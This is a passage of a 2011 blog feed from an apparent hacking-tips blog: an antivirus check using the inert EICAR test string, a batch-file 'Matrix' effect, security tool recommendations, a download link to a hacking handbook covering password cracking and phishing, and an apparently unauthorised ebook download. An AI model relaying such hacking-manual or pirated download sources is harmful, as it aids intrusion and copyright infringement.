&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:&lt;/div&gt;&lt;blockquote&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Open Notepad.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Copy the code give below in the notepad file:&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Save it with an .exe extension like testvirus.exe&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;u&gt;&lt;b&gt;NOTE&lt;/b&gt;&lt;/u&gt;: The EICAR test file (#3) is a 16-bit application and cannot be run on 64-bit versions of Windows.&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/1138928862820730001/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/test-your-anti-virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/1138928862820730001'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/1138928862820730001'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/test-your-anti-virus.html' title='Test Your Anti-Virus'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-8345083140730980875</id><published>2011-05-25T12:27:00.000+05:30</published><updated>2011-05-25T12:27:19.955+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Notepad Tricks"/><title type='text'>Make the Matrix</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;To make this, open notepad and type the following:&lt;/div&gt;&lt;blockquote&gt;@echo off&lt;br /&gt;
&amp;nbsp;color 2&lt;br /&gt;
&amp;nbsp;:start&lt;br /&gt;
&amp;nbsp;echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%&lt;br /&gt;
&amp;nbsp;goto start&lt;/blockquote&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Save this file as Matrix.bat&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;Make sure the file type is kept as ALL FILES while saving it as a .bat file.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Open the saved file and see the magic.&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/8345083140730980875/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/make-matrix.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8345083140730980875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8345083140730980875'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/make-matrix.html' title='Make the Matrix'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-7675128577917805709</id><published>2011-05-25T12:26:00.002+05:30</published><updated>2011-05-25T12:26:27.122+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="IPS/IDS"/><title type='text'>Winpatrol</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;You don&#39;t have to be doing anything wrong on the Internet to become a casualty of malware. WinPatrol takes snapshot of your critical system resources and alerts you to any changes that may occur without your knowledge. WinPatrol was the pioneer in using a heuristic behavioral approach to detecting Zero-Day attacks and violations of your computing environment. WinPatrol continues to be&amp;nbsp; the most powerful system monitor for its small memory footprint.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;WinPatrol&#39;s easy tabbed interface allows you to explore deep inside your computer without having to be a computer expert. A one-time investment in WinPatrol PLUS provides a unique experience you won&#39;t find in any other software.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;a href=&quot;http://adf.ly/1XDum&quot;&gt;Website&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/7675128577917805709/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/winpatrol.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7675128577917805709'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7675128577917805709'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/winpatrol.html' title='Winpatrol'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-7439293428316148023</id><published>2011-05-25T12:25:00.000+05:30</published><updated>2011-05-25T12:25:35.390+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Ebooks"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Password"/><title type='text'>The Hacker’s Underground Handbook</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;http://adf.ly/1XLed&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpEhL71S2vnEIEzNnOMzw6-yBqQKgFPzjejXuUuhbbnW-QchCCwdoffoLTjPIuvjrrsOzl9ggIyKjteNIQT8BJo8KcLUSeQV-MmM9GM5kMWKsfRqw3Xdf9Ewr9wZCEFaHWV0fydxkeaU0/s400/hackers__hackbook-242x300.jpg&quot; width=&quot;322&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;The Hacker’s Underground Handbook starts off with the very basics with topics like programming and Linux. It then moves on to introduce and teach the topics of&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;* password cracking&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* phishing&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* network hacking&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* wireless hacking&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* malware&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* Windows hacking&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;You can get it from&amp;nbsp;&lt;a href=&quot;http://adf.ly/1XLed&quot;&gt;here&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/7439293428316148023/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hackers-underground-handbook.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7439293428316148023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/7439293428316148023'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/hackers-underground-handbook.html' title='The Hacker’s Underground Handbook'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpEhL71S2vnEIEzNnOMzw6-yBqQKgFPzjejXuUuhbbnW-QchCCwdoffoLTjPIuvjrrsOzl9ggIyKjteNIQT8BJo8KcLUSeQV-MmM9GM5kMWKsfRqw3Xdf9Ewr9wZCEFaHWV0fydxkeaU0/s72-c/hackers__hackbook-242x300.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-4568290110399283756</id><published>2011-05-25T00:17:00.004+05:30</published><updated>2011-05-25T00:42:01.797+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ebooks"/><category scheme="http://www.blogger.com/atom/ns#" term="Programming"/><title type='text'>Cracking The Coding Interview (4 Edition)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3rJNRrDj7j5o2-Q6-ge4NU7crDrx228AVvIlvLSJtNl6BDgtbJQmJBcvH7B15r88Y2XSyDpMNCsSuVd_5NwvQ5MRrKnDBIaSCHSXoFwmwmyv5TcM6Cuedpu4XDyeS-wyk4k9UgfogL_9X/s1600/codeh.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3rJNRrDj7j5o2-Q6-ge4NU7crDrx228AVvIlvLSJtNl6BDgtbJQmJBcvH7B15r88Y2XSyDpMNCsSuVd_5NwvQ5MRrKnDBIaSCHSXoFwmwmyv5TcM6Cuedpu4XDyeS-wyk4k9UgfogL_9X/s320/codeh.jpg&quot; width=&quot;211&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Cracking the Coding Interview: 150 Programming Interview Questions and Solutions&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;CareerCup, LLC | 2010 | ISBN: 145157827X | 310 pages | PDF | 3 Mb&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;Product Description&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;Now in the 4th edition, Cracking the Coding Interview gives you the interview preparation you need to get the top software developer jobs. This book provides:&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* 150 Programming Interview Questions and Solutions: From binary trees to binary search, this list of 150 questions includes the most common and most useful questions in data structures, algorithms, and knowledge based questions.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* Ten Mistakes Candidates Make -- And How to Avoid Them: Don&#39;t lose your dream job by making these common mistakes. Learn what many candidates do wrong, and how to avoid these issues.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* Steps to Prepare for Behavioral and Technical Questions: Stop meandering through an endless set of questions, while missing some of the most important preparation techniques. Follow these steps to more thoroughly prepare in less time.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&amp;nbsp;* Interview War Stories: A View from the Interviewer&#39;s Side: Humorous but instructive stories from our interviewers show you how some candidates really flopped on the most important question - and how you can avoid doing the same.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;Download&amp;nbsp;&lt;a href=&quot;http://adf.ly/1aDb6&quot;&gt;Here&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/4568290110399283756/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/cracking-coding-interview-150.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/4568290110399283756'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/4568290110399283756'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/cracking-coding-interview-150.html' title='Cracking The Coding Interview (4 Edition)'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3rJNRrDj7j5o2-Q6-ge4NU7crDrx228AVvIlvLSJtNl6BDgtbJQmJBcvH7B15r88Y2XSyDpMNCsSuVd_5NwvQ5MRrKnDBIaSCHSXoFwmwmyv5TcM6Cuedpu4XDyeS-wyk4k9UgfogL_9X/s72-c/codeh.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-2870284731205015791</id><published>2011-05-25T00:13:00.001+05:30</published><updated>2011-05-25T00:15:54.071+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous"/><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><title type='text'>Ultimate Guide To Protect Youself</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;Here is an in-detail thread about self-protection from all the intrusions, hack attempts, rats, keylogging, stealing etc.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&amp;nbsp;The basic idea is to have a good army of ANTI&#39;s to protect yourself. You will need the following tools:-&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpLast&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;1) Anti-Virus :- Run an Anti-Virus no matter how powerful your system is. Even free ones would do. Below is the list of free topline Anti-Virus.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azVq&quot;&gt;Avira Antivirus Personal&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azUL&quot;&gt;Avast&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azRo&quot;&gt;Panda Cloud&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormalCxSpFirst&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpLast&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;2) Anti-Malware :- There are two recommendation that i would give. Both of them are free, do a great job and both run on your demand.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1Wuz6&quot;&gt;MalwareBytes Anti-Malware&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azYA&quot;&gt;Super AntiSpyware&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormalCxSpLast&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;3) Host Intrusion Prevention System:- This is also known as HIPS. It can Prevent you from unwanted intrusions like telnet acess etc. My personal recommendation is&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azaR&quot;&gt;Win Patrol&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormalCxSpFirst&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpLast&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;4) Firewall:- Dont forget to run Windows Firewall. If its setup correctly it can block most unwanted intrusions. And you could also run free firewalls out there. Some of the most used ones include&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azbp&quot;&gt;Comodo Firewall&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azdi&quot;&gt;Sunbelt Firewall&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;5) Key Scrambler:- Use some free key scramblers to protect yourself from keylogging. And most importantly use a virtual keyboard while typing in passwords of bank logins, paypal login etc.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpLast&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&amp;nbsp;Some of the free ones are:-&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;a href=&quot;http://adf.ly/1azgQ&quot;&gt;KeyScrambler&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormalCxSpFirst&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;6) Browser Selection:- Internet browsers are personal choice. No matter whatever browser you use, never save any password.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpLast&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&amp;nbsp;If you want to save passwords, then use the following method:-&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;Download&amp;nbsp; Mozilla Firefox and install it.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;Open Firefox ----&amp;gt; Tools ----&amp;gt; Options -----&amp;gt; Security Tab.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;Tick &quot;Remember password for sites&quot; and &quot;Use a master password&quot;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;Type in a master password.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormalCxSpFirst&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;&amp;nbsp;Now each time you goto a login page where the password is saved, it will first ask for the master password, hence protecting your password from stealers.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Cambria, serif;&quot;&gt;7) Sandboxie :- Use Sandboxie if you are a heavy downloader. What sandboxie does is understood from the picture below:&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormalCxSpMiddle&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;&quot;&gt;&lt;br /&gt;
